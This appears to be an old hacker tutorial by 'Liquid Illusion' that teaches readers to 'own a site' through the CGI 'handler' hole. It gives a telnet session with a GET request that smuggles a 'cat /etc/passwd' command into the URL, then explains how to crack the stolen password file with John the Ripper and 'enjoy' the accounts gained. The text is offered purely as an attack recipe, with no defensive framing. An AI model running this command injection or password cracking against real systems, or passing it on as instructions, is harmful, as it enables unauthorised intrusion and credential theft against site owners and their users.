Handler and Cracking Passwd Files

This little page off my home page will teach you how to own a site with
the old handler hole. It's basically really fucking easy so if you want
to exploit handler read below. If not go back.

EXPLOITING HANDLER:

Type the following :
# telnet siteto-own.org 80
Trying ip.of.the.site....
Connected to the.box.your.owning.
Escape character is '^]'.
GET /cgi-bin/handler/useless_shit; cat (hit tab) /etc/passwd|?data=Download

NOTE : remember to hit TAB between cat and /etc/passwd

This does not always work, and it usually won't unless the box is either
badly admined or an old system. now with the /etc/passwd file you now
need to crack it. I suggest using John the Ripper. You can find it at
www.rootshell.com. Now if the passwd file is shadowed (you can tell if
the passwd file is shadowed if it contains a * in the line rather then
random letters and numbers.) you can't crack it so if you find a
shadowed passwd file move on. If it is unshadowed then you can move on.

CRACK THE FILE:

Now that you have an unshadowed passwd file and john the ripper
installed make a txt file of the passwd file and move the text into the
dir of john the ripper. Then your ready type ./john nameoftext.txt it
will go to work. Sometimes it takes DAYS to crack a passwd file so be
patient. Other then that enjoy the user and password you will get.

-Liquid Illusion

Questions about this? E-mail me here.